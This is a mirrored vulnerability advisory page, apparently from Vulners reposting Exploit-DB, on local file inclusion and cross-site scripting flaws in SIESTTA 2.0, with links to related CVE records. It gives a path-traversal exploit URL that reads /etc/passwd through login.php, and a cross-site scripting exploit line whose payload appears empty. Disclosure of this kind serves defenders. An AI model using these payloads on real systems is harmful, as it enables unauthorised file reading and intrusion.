Lucene search
+L

SIESTTA 2.0 - Local File Inclusion / Cross-Site Scripting

🗓️ 16 Apr 2010 00:00:00Reported by JosSType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 21 Views

SIESTTA 2.0 - LFI/XSS vulnerabilities, educational purpose onl

Related
Code
ReporterTitlePublishedViews
Family
circl
Circl
CVE-2010-1710
16 Apr 201000:00
circl
circl
Circl
CVE-2010-1711
16 Apr 201000:00
circl
cve
CVE
CVE-2010-1710
4 May 201015:00
cve
cve
CVE
CVE-2010-1711
4 May 201015:00
cve
cvelist
Cvelist
CVE-2010-1710
4 May 201015:00
cvelist
cvelist
Cvelist
CVE-2010-1711
4 May 201015:00
cvelist
euvd
EUVD
EUVD-2010-1730
7 Oct 202500:30
euvd
euvd
EUVD
EUVD-2010-1731
7 Oct 202500:30
euvd
nvd
NVD
CVE-2010-1710
4 May 201016:00
nvd
nvd
NVD
CVE-2010-1711
4 May 201016:00
nvd
Rows per page
####################################################################
# SIESTTA 2.0 (LFI/XSS) Multiple Vulnerabilities
# download: http://ramoncastro.es/siestta_old/
#
# Author: Jose Luis Gongora Fernandez 'aka' JosS
# mail: sys-project[at]hotmail[dot]com
# site: http://www.hack0wn.com/
# team: Spanish Hackers Team - [SHT]
#
# Hack0wn Security Project!!
#
# This was written for educational purpose. Use it at your own risk.
# Author will be not responsible for any damage.
#
####################################################################
#
# "need" register_globals = On
#
####################################################################


- [#LFI] <login.php>

<?php

require('idioma/'.$idioma.'');
...
?>

!EXPLOIT: /login.php?idioma=/../../../../../../../../../../../etc/passwd%00

- [#XSS] <carga_foto_al.php>

<?
...
$usuario = $_GET['usuario'];
$imagen = 'admin/fotos_al/'.$usuario.'.jpg';
echo '<p style="text-align:center;">
<img class="foto" src="'.$imagen.'" alt="'.$usuario.'" /></p>
...
?>

!EXPLOIT: /carga_foto_al.php?usuario=

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation